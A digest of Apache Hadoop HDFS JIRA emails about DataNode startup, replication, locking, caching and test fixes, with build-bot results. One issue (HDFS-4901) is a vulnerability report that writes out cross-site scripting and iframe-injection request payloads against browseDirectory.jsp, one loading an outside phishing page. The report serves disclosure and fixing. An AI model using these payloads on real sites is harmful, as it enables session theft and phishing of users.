> 2014-07-15 13:00:07,839 INFO org.apache.hadoop.hdfs.server.datanode.DataNode: 
> Setting up storage: 
> nsid=859725752;bpid=BP-825373266-xx.xxx.xxx.xx-1379095203239;lv=-55;nsInfo=lv=-56;cid=CID-303ee504-e03c-4a5e-bc59-2b275b308152;nsid=859725752;c=1405453914270;bpid=BP-82537326
> 6-xx.xxx.xxx.xx-1379095203239;dnuuid=b1011b87-d7cd-48ce-92cc-f7cca0e8cbae
> {code}
> After the upgrade completes, a restart of the DN still shows a message 
> about the version difference:
> {code}
> INFO org.apache.hadoop.hdfs.server.common.Storage: Data-node version: -55 and 
> name-node layout version: -56
> {code}
> This confuses operators into thinking the upgrade did not succeed, since the 
> data node's layout version appears not to be updated to the "new LV" value.
> In fact, it is the name node's layout version that is displayed as the "new 
> LV" value.
> Since the data node and name node layout versions are now separate, the new 
> data node layout version should be shown as the "new LV".  
> Thanks to [~ehf] who found and reported this issue.





[jira] [Updated] (HDFS-5185) DN fails to startup if one of the data dir is full

2014-07-31 Thread Vinayakumar B (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-5185?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinayakumar B updated HDFS-5185:


Attachment: HDFS-5185-002.patch

Attaching the updated patch.
After the recent changes, {{checkDiskError()}} triggers a periodic thread 
that checks for disk errors asynchronously. But this issue requires a 
synchronous check for errors before initializing block pools.
Accordingly, the patch checks for errors synchronously before initializing 
block pools, excluding failed disks to avoid startup failures.

Please review.
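The intent of the patch can be sketched as follows (a simplified stand-alone 
illustration, not the actual FsDatasetImpl code; the real check also verifies 
permissions and disk health): before initializing block pools, test each 
configured data dir synchronously and drop the unusable ones instead of 
aborting startup.

```java
import java.io.File;
import java.util.ArrayList;
import java.util.List;

// Sketch: check the configured data dirs synchronously up front, excluding
// any dir that cannot be created or written to (e.g. the disk is full),
// rather than failing the whole DataNode startup.
public class UsableDirs {
    static List<File> filterUsable(List<File> dataDirs) {
        List<File> usable = new ArrayList<>();
        for (File dir : dataDirs) {
            if ((dir.isDirectory() || dir.mkdirs()) && dir.canWrite()) {
                usable.add(dir);
            }
        }
        return usable;
    }
}
```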

> DN fails to startup if one of the data dir is full
> --
>
> Key: HDFS-5185
> URL: https://issues.apache.org/jira/browse/HDFS-5185
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode
>Reporter: Vinayakumar B
>Assignee: Vinayakumar B
>Priority: Critical
> Attachments: HDFS-5185-002.patch, HDFS-5185.patch
>
>
> DataNode fails to start up if one of the configured data dirs is out of 
> space. It fails with the following exception:
> {noformat}2013-09-11 17:48:43,680 FATAL 
> org.apache.hadoop.hdfs.server.datanode.DataNode: Initialization failed for 
> block pool Block pool  (storage id 
> DS-308316523-xx.xx.xx.xx-64015-1378896293604) service to /nn1:65110
> java.io.IOException: Mkdirs failed to create 
> /opt/nish/data/current/BP-123456-1234567/tmp
> at 
> org.apache.hadoop.hdfs.server.datanode.fsdataset.impl.BlockPoolSlice.(BlockPoolSlice.java:105)
> at 
> org.apache.hadoop.hdfs.server.datanode.fsdataset.impl.FsVolumeImpl.addBlockPool(FsVolumeImpl.java:216)
> at 
> org.apache.hadoop.hdfs.server.datanode.fsdataset.impl.FsVolumeList.addBlockPool(FsVolumeList.java:155)
> at 
> org.apache.hadoop.hdfs.server.datanode.fsdataset.impl.FsDatasetImpl.addBlockPool(FsDatasetImpl.java:1593)
> at 
> org.apache.hadoop.hdfs.server.datanode.DataNode.initBlockPool(DataNode.java:834)
> at 
> org.apache.hadoop.hdfs.server.datanode.BPOfferService.verifyAndSetNamespaceInfo(BPOfferService.java:311)
> at 
> org.apache.hadoop.hdfs.server.datanode.BPServiceActor.connectToNNAndHandshake(BPServiceActor.java:217)
> at 
> org.apache.hadoop.hdfs.server.datanode.BPServiceActor.run(BPServiceActor.java:660)
> at java.lang.Thread.run(Thread.java:662)
> {noformat}
> It should continue to start up with the other available data dirs.





[jira] [Created] (HDFS-6802) Some tests in TestDFSClientFailover are missing @Test annotation

2014-07-31 Thread Akira AJISAKA (JIRA)
Akira AJISAKA created HDFS-6802:
---

 Summary: Some tests in TestDFSClientFailover are missing @Test 
annotation
 Key: HDFS-6802
 URL: https://issues.apache.org/jira/browse/HDFS-6802
 Project: Hadoop HDFS
  Issue Type: Bug
  Components: test
Affects Versions: 2.5.0
Reporter: Akira AJISAKA


HDFS-6334 added new tests in TestDFSClientFailover, but they are not executed 
by the JUnit framework because they don't have the {{@Test}} annotation.





[jira] [Commented] (HDFS-5185) DN fails to startup if one of the data dir is full

2014-07-31 Thread Hadoop QA (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-5185?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081885#comment-14081885
 ] 

Hadoop QA commented on HDFS-5185:
-

{color:red}-1 overall{color}.  Here are the results of testing the latest 
attachment 
  http://issues.apache.org/jira/secure/attachment/12627603/HDFS-5185.patch
  against trunk revision .

{color:green}+1 @author{color}.  The patch does not contain any @author 
tags.

{color:red}-1 tests included{color}.  The patch doesn't appear to include 
any new or modified tests.
Please justify why no new tests are needed for this 
patch.
Also please list what manual steps were performed to 
verify this patch.

{color:green}+1 javac{color}.  The applied patch does not increase the 
total number of javac compiler warnings.

{color:green}+1 javadoc{color}.  There were no new javadoc warning messages.

{color:green}+1 eclipse:eclipse{color}.  The patch built with 
eclipse:eclipse.

{color:green}+1 findbugs{color}.  The patch does not introduce any new 
Findbugs (version 2.0.3) warnings.

{color:green}+1 release audit{color}.  The applied patch does not increase 
the total number of release audit warnings.

{color:red}-1 core tests{color}.  The patch failed these unit tests in 
hadoop-hdfs-project/hadoop-hdfs:

  
org.apache.hadoop.hdfs.server.namenode.ha.TestPipelinesFailover

{color:green}+1 contrib tests{color}.  The patch passed contrib unit tests.

Test results: 
https://builds.apache.org/job/PreCommit-HDFS-Build/7521//testReport/
Console output: https://builds.apache.org/job/PreCommit-HDFS-Build/7521//console

This message is automatically generated.

> DN fails to startup if one of the data dir is full
> --
>
> Key: HDFS-5185
> URL: https://issues.apache.org/jira/browse/HDFS-5185
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode
>Reporter: Vinayakumar B
>Assignee: Vinayakumar B
>Priority: Critical
> Attachments: HDFS-5185.patch
>
>
> DataNode fails to start up if one of the configured data dirs is out of space. 
> It fails with the following exception:
> {noformat}2013-09-11 17:48:43,680 FATAL 
> org.apache.hadoop.hdfs.server.datanode.DataNode: Initialization failed for 
> block pool Block pool  (storage id 
> DS-308316523-xx.xx.xx.xx-64015-1378896293604) service to /nn1:65110
> java.io.IOException: Mkdirs failed to create 
> /opt/nish/data/current/BP-123456-1234567/tmp
> at 
> org.apache.hadoop.hdfs.server.datanode.fsdataset.impl.BlockPoolSlice.(BlockPoolSlice.java:105)
> at 
> org.apache.hadoop.hdfs.server.datanode.fsdataset.impl.FsVolumeImpl.addBlockPool(FsVolumeImpl.java:216)
> at 
> org.apache.hadoop.hdfs.server.datanode.fsdataset.impl.FsVolumeList.addBlockPool(FsVolumeList.java:155)
> at 
> org.apache.hadoop.hdfs.server.datanode.fsdataset.impl.FsDatasetImpl.addBlockPool(FsDatasetImpl.java:1593)
> at 
> org.apache.hadoop.hdfs.server.datanode.DataNode.initBlockPool(DataNode.java:834)
> at 
> org.apache.hadoop.hdfs.server.datanode.BPOfferService.verifyAndSetNamespaceInfo(BPOfferService.java:311)
> at 
> org.apache.hadoop.hdfs.server.datanode.BPServiceActor.connectToNNAndHandshake(BPServiceActor.java:217)
> at 
> org.apache.hadoop.hdfs.server.datanode.BPServiceActor.run(BPServiceActor.java:660)
> at java.lang.Thread.run(Thread.java:662)
> {noformat}
> It should continue to start up with the other available data dirs.





[jira] [Commented] (HDFS-6791) A block could remain under replicated if all of its replicas are on decommissioned nodes

2014-07-31 Thread Hadoop QA (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6791?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081882#comment-14081882
 ] 

Hadoop QA commented on HDFS-6791:
-

{color:red}-1 overall{color}.  Here are the results of testing the latest 
attachment 
  http://issues.apache.org/jira/secure/attachment/12659022/HDFS-6791.patch
  against trunk revision .

{color:green}+1 @author{color}.  The patch does not contain any @author 
tags.

{color:green}+1 tests included{color}.  The patch appears to include 1 new 
or modified test files.

{color:green}+1 javac{color}.  The applied patch does not increase the 
total number of javac compiler warnings.

{color:green}+1 javadoc{color}.  There were no new javadoc warning messages.

{color:green}+1 eclipse:eclipse{color}.  The patch built with 
eclipse:eclipse.

{color:green}+1 findbugs{color}.  The patch does not introduce any new 
Findbugs (version 2.0.3) warnings.

{color:green}+1 release audit{color}.  The applied patch does not increase 
the total number of release audit warnings.

{color:red}-1 core tests{color}.  The patch failed these unit tests in 
hadoop-hdfs-project/hadoop-hdfs:

  
org.apache.hadoop.hdfs.server.namenode.ha.TestPipelinesFailover

{color:green}+1 contrib tests{color}.  The patch passed contrib unit tests.

Test results: 
https://builds.apache.org/job/PreCommit-HDFS-Build/7520//testReport/
Console output: https://builds.apache.org/job/PreCommit-HDFS-Build/7520//console

This message is automatically generated.

> A block could remain under replicated if all of its replicas are on 
> decommissioned nodes
> 
>
> Key: HDFS-6791
> URL: https://issues.apache.org/jira/browse/HDFS-6791
> Project: Hadoop HDFS
>  Issue Type: Bug
>Reporter: Ming Ma
>Assignee: Ming Ma
> Attachments: HDFS-6791.patch
>
>
> Here is the scenario.
> 1. Normally, before the NN transitions a DN to decommissioned state, enough 
> replicas have been copied to other "in service" DNs. However, in some rare 
> situations, the cluster can get into a state where a DN is decommissioned 
> and a block's only replica is on that DN. In that state, the replication 
> count reported by fsck is 1; the block just stays under replicated; 
> applications can still read the data, since a decommissioned node can 
> serve read traffic.
> This can happen in error situations such as DN failure or NN failover. For 
> example:
> a) A block's only replica is temporarily on node A.
> b) The decommission process is started on node A.
> c) While node A is in "decommission-in-progress" state, node A crashes. The 
> NN marks node A as dead.
> d) After node A rejoins the cluster, the NN marks node A as decommissioned.
> 2. In theory, the NN should take care of under replicated blocks, but it 
> doesn't in this special case where the only replica is on a decommissioned 
> node. That is because the NN has the policy "a decommissioned node can't be 
> picked as the source node for replication":
> {noformat}
> BlockManager.java
> chooseSourceDatanode
>   // never use already decommissioned nodes
>   if(node.isDecommissioned())
> continue;
> {noformat}
> 3. Since the NN marks the node as decommissioned, admins will shut down the 
> datanode, and the under replicated blocks turn into missing blocks.
> 4. The workaround is to recommission the node so that the NN can start 
> replication from it.
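A minimal sketch of the fallback direction implied by point 4 (all names here are illustrative; this is not the real {{BlockManager.chooseSourceDatanode}} code): prefer an in-service replica as the replication source, but fall back to a decommissioned holder when it has the only copy, instead of skipping it entirely.

```java
import java.util.Arrays;
import java.util.List;

// Illustrative replica descriptor -- not a real HDFS type.
class Replica {
    final String node;
    final boolean decommissioned;
    Replica(String node, boolean decommissioned) {
        this.node = node;
        this.decommissioned = decommissioned;
    }
}

public class SourcePicker {
    // Prefer an in-service node; use a decommissioned node only as a
    // last resort so the block does not stay under replicated forever.
    static Replica chooseSource(List<Replica> replicas) {
        Replica fallback = null;
        for (Replica r : replicas) {
            if (!r.decommissioned) return r;  // normal case
            fallback = r;                     // remember a decommissioned holder
        }
        return fallback;
    }

    public static void main(String[] args) {
        Replica only = chooseSource(Arrays.asList(new Replica("dnA", true)));
        System.out.println(only.node); // prints dnA
    }
}
```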





[jira] [Commented] (HDFS-4901) Site Scripting and Phishing Through Frames in browseDirectory.jsp

2014-07-31 Thread Hadoop QA (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-4901?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081864#comment-14081864
 ] 

Hadoop QA commented on HDFS-4901:
-

{color:red}-1 overall{color}.  Here are the results of testing the latest 
attachment 
  
http://issues.apache.org/jira/secure/attachment/12627367/HDFS-4901_branch-1.2.patch
  against trunk revision .

{color:red}-1 patch{color}.  The patch command could not apply the patch.

Console output: https://builds.apache.org/job/PreCommit-HDFS-Build/7523//console

This message is automatically generated.

> Site Scripting and Phishing Through Frames in browseDirectory.jsp
> -
>
> Key: HDFS-4901
> URL: https://issues.apache.org/jira/browse/HDFS-4901
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: security, webhdfs
>Affects Versions: 1.2.1
>Reporter: Jeffrey E  Rodriguez
>Assignee: Vivek Ganesan
>Priority: Blocker
> Attachments: HDFS-4901.patch, HDFS-4901.patch.1, 
> HDFS-4901_branch-1.2.patch
>
>   Original Estimate: 24h
>  Time Spent: 24h
>  Remaining Estimate: 0h
>
> It is possible to steal or manipulate customer session and cookies, which 
> might be used to impersonate a legitimate user,
> allowing the hacker to view or alter user records, and to perform 
> transactions as that user.
> e.g.
> GET /browseDirectory.jsp? dir=%2Fhadoop'"/>alert(759) 
> &namenodeInfoPort=50070
> Also;
> Phishing Through Frames
> Try:
> GET /browseDirectory.jsp? 
> dir=%2Fhadoop%27%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fdemo.testfire.net%2Fphishing.html%3E
> &namenodeInfoPort=50070 HTTP/1.1
> Cookie: JSESSIONID=qd9i8tuccuam1cme71swr9nfi
> Accept-Language: en-US
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;
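A minimal illustration (not the actual browseDirectory.jsp fix) of the kind of output escaping that neutralizes the payloads above: HTML-encode the user-supplied {{dir}} parameter before echoing it into the page, so injected script and iframe tags come out inert.

```java
public class HtmlEscape {
    // Encode the five characters that matter for HTML element/attribute
    // contexts; everything else passes through unchanged.
    static String escape(String s) {
        StringBuilder out = new StringBuilder();
        for (char c : s.toCharArray()) {
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    public static void main(String[] args) {
        // An iframe injected via the dir parameter is rendered as text.
        System.out.println(escape("/hadoop'\"><iframe src=phishing.html>"));
    }
}
```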





[jira] [Commented] (HDFS-6783) Fix HDFS CacheReplicationMonitor rescan logic

2014-07-31 Thread Hadoop QA (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6783?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081859#comment-14081859
 ] 

Hadoop QA commented on HDFS-6783:
-

{color:red}-1 overall{color}.  Here are the results of testing the latest 
attachment 
  http://issues.apache.org/jira/secure/attachment/12659005/HDFS-6783.003.patch
  against trunk revision .

{color:green}+1 @author{color}.  The patch does not contain any @author 
tags.

{color:red}-1 tests included{color}.  The patch doesn't appear to include 
any new or modified tests.
Please justify why no new tests are needed for this 
patch.
Also please list what manual steps were performed to 
verify this patch.

{color:green}+1 javac{color}.  The applied patch does not increase the 
total number of javac compiler warnings.

{color:green}+1 javadoc{color}.  There were no new javadoc warning messages.

{color:green}+1 eclipse:eclipse{color}.  The patch built with 
eclipse:eclipse.

{color:green}+1 findbugs{color}.  The patch does not introduce any new 
Findbugs (version 2.0.3) warnings.

{color:green}+1 release audit{color}.  The applied patch does not increase 
the total number of release audit warnings.

{color:red}-1 core tests{color}.  The patch failed these unit tests in 
hadoop-hdfs-project/hadoop-hdfs:

  
org.apache.hadoop.hdfs.server.namenode.ha.TestPipelinesFailover

{color:green}+1 contrib tests{color}.  The patch passed contrib unit tests.

Test results: 
https://builds.apache.org/job/PreCommit-HDFS-Build/7518//testReport/
Console output: https://builds.apache.org/job/PreCommit-HDFS-Build/7518//console

This message is automatically generated.

> Fix HDFS CacheReplicationMonitor rescan logic
> -
>
> Key: HDFS-6783
> URL: https://issues.apache.org/jira/browse/HDFS-6783
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: caching
>Affects Versions: 3.0.0
>Reporter: Yi Liu
>Assignee: Yi Liu
> Attachments: HDFS-6783.001.patch, HDFS-6783.002.patch, 
> HDFS-6783.003.patch
>
>
> In the monitor thread, needsRescan is set to false before the real scan 
> starts, so {{waitForRescanIfNeeded}} will return at the first condition:
> {code}
> if (!needsRescan) {
>   return;
> }
> {code}





[jira] [Commented] (HDFS-6789) TestDFSClientFailover.testFileContextDoesntDnsResolveLogicalURI and TestDFSClientFailover.testDoesntDnsResolveLogicalURI failing on jdk7

2014-07-31 Thread Akira AJISAKA (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6789?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081849#comment-14081849
 ] 

Akira AJISAKA commented on HDFS-6789:
-

I applied the patch and confirmed the tests passed in two environments:
* Oracle JDK7u40 in Mac OS X 10.9
* Oracle JDK7u65 in CentOS 6.4

> TestDFSClientFailover.testFileContextDoesntDnsResolveLogicalURI and 
> TestDFSClientFailover.testDoesntDnsResolveLogicalURI failing on jdk7
> 
>
> Key: HDFS-6789
> URL: https://issues.apache.org/jira/browse/HDFS-6789
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: test
>Affects Versions: 2.5.0
> Environment: jdk7
>Reporter: Rushabh S Shah
>Assignee: Akira AJISAKA
> Attachments: HDFS-6789.patch
>
>
> The following two tests are failing on jdk7.
> org.apache.hadoop.hdfs.TestDFSClientFailover.testFileContextDoesntDnsResolveLogicalURI
> org.apache.hadoop.hdfs.TestDFSClientFailover.testDoesntDnsResolveLogicalURI
> On jdk6 it just skips the tests.





[jira] [Commented] (HDFS-6788) Improve synchronization in BPOfferService with read write lock

2014-07-31 Thread Yongjun Zhang (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6788?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081847#comment-14081847
 ] 

Yongjun Zhang commented on HDFS-6788:
-

Hi Andrew and Arpit,  Thanks a lot for reviewing and addressing my question, 
and even taking care of triggering the build! 




> Improve synchronization in BPOfferService with read write lock
> --
>
> Key: HDFS-6788
> URL: https://issues.apache.org/jira/browse/HDFS-6788
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode
>Affects Versions: 2.5.0
>Reporter: Yongjun Zhang
>Assignee: Yongjun Zhang
> Attachments: HDFS-6788.001.patch, HDFS-6788.002.patch
>
>
> Threads in the DN (DataXceiver, PacketResponder, async disk worker, etc.) may 
> block at BPOfferService.getBlockPoolId() when calling 
> BPOfferService.checkBlock(), even though they are just reading the same 
> blockpool id. This is unnecessary overhead and may cause a performance hit 
> when many threads compete. Filing this jira to replace the synchronized 
> method with a read write lock (ReentrantReadWriteLock).
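The proposed change can be sketched as follows (a standalone illustration, not the actual {{BPOfferService}} code): a {{ReentrantReadWriteLock}} lets many threads read the block pool id concurrently, while writers still get exclusive access.

```java
import java.util.concurrent.locks.ReentrantReadWriteLock;

public class BlockPoolIdHolder {
    private final ReentrantReadWriteLock lock = new ReentrantReadWriteLock();
    private String blockPoolId;

    // Many readers may hold the read lock at once, so readers of the
    // same id no longer serialize on an object monitor.
    public String getBlockPoolId() {
        lock.readLock().lock();
        try {
            return blockPoolId;
        } finally {
            lock.readLock().unlock();
        }
    }

    // The write lock is exclusive: it blocks both readers and writers.
    public void setBlockPoolId(String id) {
        lock.writeLock().lock();
        try {
            this.blockPoolId = id;
        } finally {
            lock.writeLock().unlock();
        }
    }

    public static void main(String[] args) {
        BlockPoolIdHolder h = new BlockPoolIdHolder();
        h.setBlockPoolId("BP-1");
        System.out.println(h.getBlockPoolId()); // prints BP-1
    }
}
```

The win over {{synchronized}} is only for the read-mostly case described in the report; if writes were frequent, the extra bookkeeping of a read write lock could cost more than it saves.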





[jira] [Updated] (HDFS-6789) TestDFSClientFailover.testFileContextDoesntDnsResolveLogicalURI and TestDFSClientFailover.testDoesntDnsResolveLogicalURI failing on jdk7

2014-07-31 Thread Akira AJISAKA (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6789?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Akira AJISAKA updated HDFS-6789:


Target Version/s: 2.5.0
  Status: Patch Available  (was: Open)

> TestDFSClientFailover.testFileContextDoesntDnsResolveLogicalURI and 
> TestDFSClientFailover.testDoesntDnsResolveLogicalURI failing on jdk7
> 
>
> Key: HDFS-6789
> URL: https://issues.apache.org/jira/browse/HDFS-6789
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: test
>Affects Versions: 2.5.0
> Environment: jdk7
>Reporter: Rushabh S Shah
>Assignee: Akira AJISAKA
> Attachments: HDFS-6789.patch
>
>
> The following two tests are failing on jdk7.
> org.apache.hadoop.hdfs.TestDFSClientFailover.testFileContextDoesntDnsResolveLogicalURI
> org.apache.hadoop.hdfs.TestDFSClientFailover.testDoesntDnsResolveLogicalURI
> On jdk6 it just skips the tests.





[jira] [Updated] (HDFS-6789) TestDFSClientFailover.testFileContextDoesntDnsResolveLogicalURI and TestDFSClientFailover.testDoesntDnsResolveLogicalURI failing on jdk7

2014-07-31 Thread Akira AJISAKA (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6789?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Akira AJISAKA updated HDFS-6789:


Component/s: test

> TestDFSClientFailover.testFileContextDoesntDnsResolveLogicalURI and 
> TestDFSClientFailover.testDoesntDnsResolveLogicalURI failing on jdk7
> 
>
> Key: HDFS-6789
> URL: https://issues.apache.org/jira/browse/HDFS-6789
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: test
>Affects Versions: 2.5.0
> Environment: jdk7
>Reporter: Rushabh S Shah
>Assignee: Akira AJISAKA
> Attachments: HDFS-6789.patch
>
>
> The following two tests are failing on jdk7.
> org.apache.hadoop.hdfs.TestDFSClientFailover.testFileContextDoesntDnsResolveLogicalURI
> org.apache.hadoop.hdfs.TestDFSClientFailover.testDoesntDnsResolveLogicalURI
> On jdk6 it just skips the tests.





[jira] [Updated] (HDFS-6789) TestDFSClientFailover.testFileContextDoesntDnsResolveLogicalURI and TestDFSClientFailover.testDoesntDnsResolveLogicalURI failing on jdk7

2014-07-31 Thread Akira AJISAKA (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6789?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Akira AJISAKA updated HDFS-6789:


Attachment: HDFS-6789.patch

Attaching a patch to spy NameService after initializing FileSystem.

> TestDFSClientFailover.testFileContextDoesntDnsResolveLogicalURI and 
> TestDFSClientFailover.testDoesntDnsResolveLogicalURI failing on jdk7
> 
>
> Key: HDFS-6789
> URL: https://issues.apache.org/jira/browse/HDFS-6789
> Project: Hadoop HDFS
>  Issue Type: Bug
>Affects Versions: 2.5.0
> Environment: jdk7
>Reporter: Rushabh S Shah
>Assignee: Akira AJISAKA
> Attachments: HDFS-6789.patch
>
>
> The following two tests are failing on jdk7.
> org.apache.hadoop.hdfs.TestDFSClientFailover.testFileContextDoesntDnsResolveLogicalURI
> org.apache.hadoop.hdfs.TestDFSClientFailover.testDoesntDnsResolveLogicalURI
> On jdk6 it just skips the tests.





[jira] [Commented] (HDFS-6787) Remove duplicate code in FSDirectory#unprotectedConcat

2014-07-31 Thread Yi Liu (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6787?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081838#comment-14081838
 ] 

Yi Liu commented on HDFS-6787:
--

Thanks Uma, yes, I have confirmed in the debugger that the inodes are cleaned 
up correctly.

> Remove duplicate code in FSDirectory#unprotectedConcat
> --
>
> Key: HDFS-6787
> URL: https://issues.apache.org/jira/browse/HDFS-6787
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: namenode
>Affects Versions: 3.0.0
>Reporter: Yi Liu
>Assignee: Yi Liu
> Attachments: HDFS-6787.001.patch
>
>
> {code}
> // update inodeMap
> removeFromInodeMap(Arrays.asList(allSrcInodes));
> {code}
> This snippet of code is duplicated, since we already have the logic above it:
> {code}
> for(INodeFile nodeToRemove: allSrcInodes) {
>   if(nodeToRemove == null) continue;
>   
>   nodeToRemove.setBlocks(null);
>   trgParent.removeChild(nodeToRemove, trgLatestSnapshot);
>   inodeMap.remove(nodeToRemove);
>   count++;
> }
> {code}





[jira] [Updated] (HDFS-6794) Update BlockManager methods to use DatanodeStorageInfo where possible

2014-07-31 Thread Tsz Wo Nicholas Sze (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6794?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Tsz Wo Nicholas Sze updated HDFS-6794:
--

 Component/s: namenode
Priority: Minor  (was: Major)
Hadoop Flags: Reviewed

+1 patch looks good.

> Update BlockManager methods to use DatanodeStorageInfo where possible
> -
>
> Key: HDFS-6794
> URL: https://issues.apache.org/jira/browse/HDFS-6794
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: namenode
>Reporter: Arpit Agarwal
>Assignee: Arpit Agarwal
>Priority: Minor
> Attachments: HDFS-6794.01.patch, HDFS-6794.02.patch, 
> HDFS-6794.03.patch, HDFS-6794.03.patch
>
>
> Post HDFS-2832, BlockManager methods can be updated to accept 
> DatanodeStorageInfo instead of (DatanodeDescriptor + StorageID).





[jira] [Commented] (HDFS-6789) TestDFSClientFailover.testFileContextDoesntDnsResolveLogicalURI and TestDFSClientFailover.testDoesntDnsResolveLogicalURI failing on jdk7

2014-07-31 Thread Akira AJISAKA (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6789?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081837#comment-14081837
 ] 

Akira AJISAKA commented on HDFS-6789:
-

The tests fail because
{code}
FileSystem fs = HATestUtil.configureFailoverFs(cluster, conf);
{code}
calls {{NameNode.getAddress(nameNodeUri)}} to get {{InetSocketAddress}} for 
initializing {{ProxyAndInfo}} after HDFS-6507.
Since the tests are to ensure {{FileSystem}} and {{FileContext}} do not 
resolve the logical hostname, I think it's fine to spy NameService after 
initializing {{FileSystem}}.

> TestDFSClientFailover.testFileContextDoesntDnsResolveLogicalURI and 
> TestDFSClientFailover.testDoesntDnsResolveLogicalURI failing on jdk7
> 
>
> Key: HDFS-6789
> URL: https://issues.apache.org/jira/browse/HDFS-6789
> Project: Hadoop HDFS
>  Issue Type: Bug
>Affects Versions: 2.5.0
> Environment: jdk7
>Reporter: Rushabh S Shah
>Assignee: Akira AJISAKA
>
> The following two tests are failing on jdk7.
> org.apache.hadoop.hdfs.TestDFSClientFailover.testFileContextDoesntDnsResolveLogicalURI
> org.apache.hadoop.hdfs.TestDFSClientFailover.testDoesntDnsResolveLogicalURI
> On jdk6 it just skips the tests.





[jira] [Created] (HDFS-6801) Archival Storage: Add a new data migration tool

2014-07-31 Thread Tsz Wo Nicholas Sze (JIRA)
Tsz Wo Nicholas Sze created HDFS-6801:
-

 Summary: Archival Storage: Add a new data migration tool 
 Key: HDFS-6801
 URL: https://issues.apache.org/jira/browse/HDFS-6801
 Project: Hadoop HDFS
  Issue Type: Sub-task
Reporter: Tsz Wo Nicholas Sze
Assignee: Tsz Wo Nicholas Sze


The tool is similar to Balancer.  It periodically scans the blocks in HDFS and 
uses the path and/or other metadata (e.g. mtime) to determine if a block should 
be cooled down (i.e. hot => warm, or warm => cold) or warmed up (i.e. cold => 
warm, or warm => hot).  In contrast to Balancer, the migration tool always 
moves replicas to a different storage type.  Similar to Balancer, the replicas 
are moved in a way that the number of racks the block spans does not decrease.






[jira] [Updated] (HDFS-6794) Update BlockManager methods to use DatanodeStorageInfo where possible

2014-07-31 Thread Arpit Agarwal (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6794?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Arpit Agarwal updated HDFS-6794:


Attachment: HDFS-6794.03.patch

I missed that from the last Jenkins run, thanks Nicholas.

Updated patch attached.

> Update BlockManager methods to use DatanodeStorageInfo where possible
> -
>
> Key: HDFS-6794
> URL: https://issues.apache.org/jira/browse/HDFS-6794
> Project: Hadoop HDFS
>  Issue Type: Improvement
>Reporter: Arpit Agarwal
>Assignee: Arpit Agarwal
> Attachments: HDFS-6794.01.patch, HDFS-6794.02.patch, 
> HDFS-6794.03.patch, HDFS-6794.03.patch
>
>
> Post HDFS-2832, BlockManager methods can be updated to accept 
> DatanodeStorageInfo instead of (DatanodeDescriptor + StorageID).





[jira] [Commented] (HDFS-6784) Avoid rescan twice in HDFS CacheReplicationMonitor for one FS Op if it calls setNeedsRescan multiple times.

2014-07-31 Thread Yi Liu (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6784?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081811#comment-14081811
 ] 

Yi Liu commented on HDFS-6784:
--

Thanks [~cmccabe], let's wait to see whether we need to handle it separately 
after HDFS-6783.

> Avoid rescan twice in HDFS CacheReplicationMonitor for one FS Op if it calls 
> setNeedsRescan multiple times.
> ---
>
> Key: HDFS-6784
> URL: https://issues.apache.org/jira/browse/HDFS-6784
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: caching
>Affects Versions: 3.0.0
>Reporter: Yi Liu
>Assignee: Yi Liu
> Attachments: HDFS-6784.001.patch
>
>
> In HDFS CacheReplicationMonitor, rescan is expensive. Sometimes 
> {{setNeedsRescan}} is called multiple times for one FS op; for example, in 
> FSNamesystem#modifyCacheDirective it is called 3 times. In the monitor thread 
> of CacheReplicationMonitor, if it sees that {{needsRescan}} is true, a rescan 
> happens, but {{needsRescan}} is set to false before the real scan. Meanwhile, 
